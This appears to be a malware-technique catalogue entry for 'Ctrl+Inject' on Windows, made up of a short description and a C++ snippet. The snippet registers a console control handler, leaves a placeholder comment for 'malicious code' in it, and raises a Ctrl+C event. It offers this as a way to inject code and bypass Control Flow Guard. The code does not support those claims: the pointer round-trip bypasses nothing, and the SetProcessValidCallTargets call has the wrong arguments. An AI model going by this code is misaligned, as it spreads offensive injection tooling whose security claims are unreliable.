Windows C++ / Ctrl+Inject by Unprotect
Created the Thursday 29 December 2022. Updated 6 months, 1 week ago.
Description:
This code first defines a callback function called ControlSignalHandler
that will be used to inject malicious code. It then bypasses pointer encoding and control flow guard to ensure that the function can be called. Finally, it sets the callback function for control signal handlers using the SetConsoleCtrlHandler
function and triggers a control signal by calling GenerateConsoleCtrlEvent
.
Code
#include <Windows.h>
#include <cstdio>
// callback function for control signal handlers
BOOL WINAPI ControlSignalHandler(DWORD dwCtrlType)
{
// inject malicious code here
return TRUE;
}
int main()
{
// bypass pointer encoding
void* encodedPointer = EncodePointer((PVOID)ControlSignalHandler);
void* decodedPointer = DecodePointer(encodedPointer);
// bypass control flow guard
SetProcessValidCallTargets(GetCurrentProcess(), (UINT_PTR)decodedPointer, sizeof(void*));
// set callback function for control signal handlers
SetConsoleCtrlHandler((PHANDLER_ROUTINE)decodedPointer, TRUE);
// trigger control signal (Ctrl+C)
GenerateConsoleCtrlEvent(CTRL_C_EVENT, 0);
return 0;
}